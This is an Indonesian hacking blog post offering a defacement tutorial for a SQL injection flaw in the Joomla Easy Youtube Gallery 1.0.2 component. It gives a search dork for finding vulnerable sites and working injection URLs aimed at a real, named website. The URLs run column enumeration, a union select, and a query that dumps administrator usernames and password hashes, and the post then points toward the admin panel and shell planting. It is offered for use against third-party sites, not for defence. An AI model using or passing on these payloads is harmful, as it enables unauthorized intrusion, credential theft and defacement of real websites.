Rabu, 11 Mei 2016

Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability

Stay Cool and Keep ./Crotz gaes, kali ini gue 3xBitCh bakal Share Tutorial Deface Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability
yoii kali ini kita maen suntik2an di CMS Joomblo.

Oke langsung Aja gay gak usah banyak coli cocote

Dork :
inurl:com_easy_youtube_gallery mycategory
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)

1. Kita Search Dork nya menggunakan search engine


2. Oke kita Pilih Target Yang mau kita injek, disini letak injeknya ada di mycategory= ,
kita coba input string ,jika seperti ini tandanya VULN 


3. Sekarang kita coba cari errornya dimana. 
Kita coba injek satu satu:
http://centreexcursionistabocairent.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+order+by+1--+&defaultvideo=3&Itemid=120 // masih normal

http://centreexcursionistabocairent.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+order+by+2--+&defaultvideo=3&Itemid=120  // masih normal lagee

http://centreexcursionistabocairent.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+order+by+3--+&defaultvideo=3&Itemid=120 // masih normal mpe lemez mz

http://centreexcursionistabocairent.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0+order+by+15--+&defaultvideo=3&Itemid=120 // error gan :v *jozz ahhh~

Kolomnya cuman sampe 14 gannn
4. Oke lanjut ke step berikutnya, kita cari angka ajaibnya :D

http://centreexcursionistabocairent.com/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=-0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--+&defaultvideo=3&Itemid=120

Nah, angka ajaibnya Keliatan Gay :v
5. Oke biar gampang, saya pake DIOS nya mas madblood /-\ 

Nah keliatankan Isi daleman web nya ?:v
6. Sekarang kita liat lebih dalem lagi gimana? :v 


Tuh DALEMANNYA keliatan gann :v
Terus abis itu diapain , kalo dh keliatan dalemannya ? , buka tusuk -> crotz di dalem..

Ini querynya :
http://centreexcursionistabocairent.com/index.php
?option=com_easy_youtube_gallery
&view=videos
&mycategory=-0+union+select+1,2,3,4,5,6,group_concat(username,0x3a,password),8,9,10,11,12,13,14+from+ceb_users--+
&defaultvideo=3
&Itemid=120



Karna ini cms Joomla letak page adminnya ada di target.coli/administrator/
Baca juga, tutorial cara menanam Shell di CMS Joomla: Cara Deface Com_User Auto Exploiter dan Cara menanam shell di CMS Joomla

Btw yuk up2date tentang TKJ Cyber Art, di Official Account Line Kami: http://line.me/ti/p/%40hjl8740i
*bebas utk bertanya *sharing bareng *kepo2deh akwkwa #joinUs

Selamat berinjek dan berhash2 ria akwkawk
Oke Sekian tutorial dari saya, Semoga bermanfaat bagi kalean.

source and thanks to: 0day


Call Me Sayang A.K.A 3xBitch


tidak perlu muncul ke permukaan , yang penting tetap bergerilya












Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

0 komentar:

Posting Komentar

 

ande ande lumoet Template by Ipietoon Cute Blog Design